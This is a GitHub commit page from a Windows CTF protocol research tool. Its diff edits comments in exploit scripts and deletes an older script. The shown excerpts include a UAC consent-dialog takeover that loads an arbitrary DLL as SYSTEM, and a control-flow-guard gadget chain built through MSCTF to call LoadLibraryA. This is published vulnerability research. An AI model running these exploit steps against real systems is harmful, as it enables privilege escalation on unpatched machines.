Skip to content
Permalink
Browse files

remove outdated script, the common scripts are better.

  • Loading branch information...
taviso committed Jun 17, 2019
1 parent b68e22f commit 9cd3a4e1170bdd834bddc7d419811f1d37c207c0
Showing with 10 additions and 132 deletions.
  1. +2 −3 scripts/ctf-consent-system.ctf
  2. +7 −8 scripts/ctf-exploit-common-1903.ctf
  3. +0 −120 scripts/ctfmonexploit.ctf
  4. +1 −1 version.rc
@@ -1,11 +1,10 @@
# This script launches loads an arbitrary dll as SYSTEM on Win10 1903 x64. This
# This script loads an arbitrary dll as SYSTEM on Win10 1903 x64. This
# works by taking over the UAC consent dialog, which can be invoked by any
# user (for example, by using the runas verb with ShellExecute()).

# This exploit runs LoadLibraryA(C:\WINDOWS\TEMP\EXPLOIT.DLL) as SYSTEM.
print Attempting to copy exploit payload...

# Try to install the payload.
# This exploit runs LoadLibraryA(C:\WINDOWS\TEMP\EXPLOIT.DLL) as SYSTEM.
run CMD /C COPY PAYLOAD64.DLL %SYSTEMROOT%\TEMP\EXPLOIT.DLL

# Print a warning if that didnt work.
@@ -1,6 +1,5 @@
# This script launches loads an arbitrary dll as SYSTEM on Win10 1903 x64. This
# works by taking over the UAC consent dialog, which can be invoked by any
# user (for example, by using the runas verb with ShellExecute()).
# This script loads an arbitrary dll into the current default process on Win10
# 1903 x64.

# The function index to reach MSCTF!CTipProxy::Reconvert.
set r3 480
@@ -31,7 +30,7 @@ createstub 0 4 IID_IEnumTfInputProcessorProfiles

# At index 496 of this table is a pointer to MSCTF!CTipProxy::Reconvert, which
# is a whitelsited indirect branch target and happens to rearrange our stack
# so that pointers to buffers we control are on the registers.
# so that pointers to buffers we control are on the registers.
#
# It then does another indirect call to an address we control, so we can build
# a CFG jump chain.
@@ -58,7 +57,7 @@ setarg MARSHAL_TYPE_DATA "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
module64 msvcrt
patch 0 0x40 module 8 r4

# I need to create an object somewhere that my gadgets can use, It needs to look
# I need to create an object somewhere that my gadgets can use, It needs to look
# like an object with a vtable as all of the gadgets I are small thiscall helpers.
# I don't know the address of the stack, but images are only randomized per-boot
# on Windows, so if I use some unused space in the data section of an image I
@@ -145,7 +144,7 @@ repeat r1 callstub 0 0 r3
# 0:000> combase!CStdProxyBuffer_CF_AddRef:
# mov rcx,qword ptr [rcx-38h] <-- pointer inside a buffer we control
# mov rax,qword ptr [rcx] <-- load a vtable, this is offset 0x10 into our string.
# mov rax,qword ptr [rax+8] <-- derefence vtable ptr
# mov rax,qword ptr [rax+8] <-- dereference vtable ptr
# jmp qword ptr [combase!__guard_dispatch_icall_fptr]

# We will use msctf!CCompartmentEventSink::`vftable', the OnChange member is an
@@ -171,7 +170,7 @@ patch 0 0x48 r0 8 +0x38
# MSCTF!CCompartmentEventSink::OnChange.
# jmp qword ptr [combase!__guard_dispatch_icall_fptr]
#
# I know, I know, how the hell does this even work? It took some work.
# I know, I know, how the hell does this even work? It took some work....

# The final stage gadget bounces us back to MSCTF!CCompartmentEventSink::OnChange
# where we can finally load arbitrary rcx and rip.
@@ -311,7 +310,7 @@ repeat r1 callstub 0 0 r3

print The CFG call chain is built, writing in parameters...

# Just jumping to LoadLibraryA() wont do very much unless we also give it an
# Just jumping to LoadLibraryA() wont do very much unless we also give it a
# module to load, so lets write in the address of the buffer immediately after
# our object, then write a path into it.
set r2 module

This file was deleted.

@@ -15,7 +15,7 @@ FILETYPE VFT_APP
VALUE "CompanyName", "Tavis Ormandy"
VALUE "FileDescription", "Interactive CTF Exploration Tool"
VALUE "ProductName", "ctftool"
VALUE "Comment", "https://github.com/taviso/"
VALUE "Comment", "https://github.com/taviso/ctftool"
}
}
BLOCK "VarFileInfo"

0 comments on commit 9cd3a4e

Please sign in to comment.
You can’t perform that action at this time.